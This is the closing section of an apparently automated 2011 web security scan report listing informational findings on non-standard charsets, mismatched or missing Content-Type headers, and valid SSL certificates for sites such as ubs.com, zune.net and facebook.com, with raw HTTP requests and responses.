ETag: "ba1f6-655d-f92fc780"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 25949
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=GB2312"/>
<!-- InstanceEndEditable -->
...[SNIP]...
22.7. http://www.ubs.com/4/legal_disclaimer/tr_hk_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/tr_hk_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/tr_hk_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:16:18 GMT
ETag: "ba1fa-6d2b-c7fa080"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 27947
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=big5"/>
<!-- InstanceEndEditable -->
...[SNIP]...
22.8. http://www.ubs.com/4/legal_disclaimer/tr_tw_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/tr_tw_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/tr_tw_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:18:16 GMT
ETag: "ba1fd-65b6-13882a00"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 26038
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=big5"/>
<!-- InstanceEndEditable -->
...[SNIP]...
23. Content type incorrectly stated  previous  next
There are 14 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

23.1. http://seg.sharethis.com/socialOptimization.ps.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie9 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:03 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1396

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie9';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="str
...[SNIP]...
23.2. http://urls.api.twitter.com/1/urls/count.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Wed, 06 Jul 2011 14:07:26 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})
23.3. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://watson.microsoft.com
Path:   /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm?LCID=1033&OS=6.1.7600.2.00030110.0.0.7.16385&SR6=0&SR5=0&SR4=0&SR3=0&SR2=0&SR1=2&SM=Xen&SPN=HVM%20domU&BV=3.4.2&MID=02B561F5-F97B-4B2F-ADF4-C485C85915EF HTTP/1.1
User-Agent: MSDW
Proxy-Connection: Keep-Alive
Host: watson.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 05 Jul 2011 06:05:21 GMT
Accept-Ranges: bytes
ETag: "0bcb385d93acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:18:13 GMT
Content-Length: 46

Bucket=1783942133
BucketTable=5
Response=1
23.4. http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cadence.com
Path:   /_layouts/_cdn_js_lib/js_banners.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /_layouts/_cdn_js_lib/js_banners.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 17754
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js
Last-Modified: Fri, 03 Jun 2011 00:05:09 GMT
Accept-Ranges: bytes
ETag: "802896e68121cc1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:24 GMT

..d.o.c.u.m.e.n.t...w.r.i.t.e.(.".<.M.E.T.A. .H.T.T.P.-.E.Q.U.I.V.=.'.P.r.a.g.m.a.'. .C.O.N.T.E.N.T.=.'.n.o.-.c.a.c.h.e.'.>.".).;..
././.h.a.s.h. .c.l.a.s.s..
.f.u.n.c.t.i.o.n. .H.a.s.h.(.)..
.{..
...[SNIP]...
23.5. http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cadence.com
Path:   /_layouts/_cdn_js_lib/js_library.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /_layouts/_cdn_js_lib/js_library.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 33010
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js
Last-Modified: Wed, 03 Nov 2010 22:35:02 GMT
Accept-Ranges: bytes
ETag: "02f9a5aa77bcb1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:23 GMT

.././.o.p.e.n. .o.n.-.d.e.m.a.n.d. .v.i.d.e.o..
.f.u.n.c.t.i.o.n. .p.l.a.y.V.i.d.e.o.(.p.a.g.e.U.R.L.). ..
.{..
.    .v.a.r. .c.a.d.e.n.c.e.=.w.i.n.d.o.w...o.p.e.n.(.p.a.g.e.U.R.L.,.'.'.,.'.w.i.d.t.h.
...[SNIP]...
23.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.45.44
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 22

Invalid Application ID
23.7. http://www.masshightech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.masshightech.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.masshightech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:12:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Jul 2008 20:19:59 GMT
Accept-Ranges: bytes
Cteonnt-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:24:56 GMT;path=/
Cache-Control: private
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................).......c..m............J...J..}....s..}!...........9.......9......y........!...1...k.......B..............y....
...[SNIP]...
23.8. http://www.masshightech.com/tech-news-widget/parser/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp1309960847664&_=1309960851255 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2317
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:00 GMT;path=/

jsonp1309960847664({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDa
...[SNIP]...
23.9. http://www.mister-wong.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Wed, 06 Jul 2011 11:21:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 503 Service Temporarily Unavailable
Vary: Accept-Encoding
Content-Length: 380

<center>
       <div style="padding: 10px; margin-top: 100px; border: 4px solid #CC0000; width: 500px; font-family: verdana; font-size: 12px;">
       <strong>Oops, there was an error</strong><br />Somewhere a
...[SNIP]...
23.10. http://www.tudou.com/v/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
   <meta http-equiv="Content-Language" content="zh-CN" />
...[SNIP]...
23.11. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.websitealive8.com
Path:   /1245/Visitor/vTracker_v2.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1245/Visitor/vTracker_v2.asp?websiteid=0&groupid=1245 HTTP/1.1
Host: www.websitealive8.com
Proxy-Connection: keep-alive
Referer: http://www.metricstream.com/library/Library_5.jsp?prob=Compliance%20Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADASDBS=ANOCIOEDOGMMJDHEPBCFJNDG

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 7795
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...
23.12. http://zune.net/en-US/bottom.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /en-US/bottom.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /en-US/bottom.png HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; lastCulture=en-US; defCulture=en-US

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 11:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S103
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found
23.13. http://zune.net/en-US/top.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /en-US/top.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /en-US/top.png HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; lastCulture=en-US; defCulture=en-US

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 11:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found
23.14. http://zune.net/xml/Carousel.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /xml/Carousel.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /xml/Carousel.xml HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found
24. Content type is not specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /submit?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass controls - Microsoft Search HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Length: 1344
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html>
<head>
<title>StumbleUpon &mdash; Looks like there's a problem.</title>
<style type="text/css">
body {background:#F6FAFF;margin:0;padding:0;color:#645F5F;font-family:Ari
...[SNIP]...
25. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

25.1. https://www.ubs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ubs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu May 05 19:00:00 CDT 2011
Valid to:  Wed May 29 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
25.2. https://www2.ubs.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www2.ubs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu May 05 19:00:00 CDT 2011
Valid to:  Wed May 29 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
Report generated by XSS.CX at Sat Jul 09 06:02:38 CDT 2011.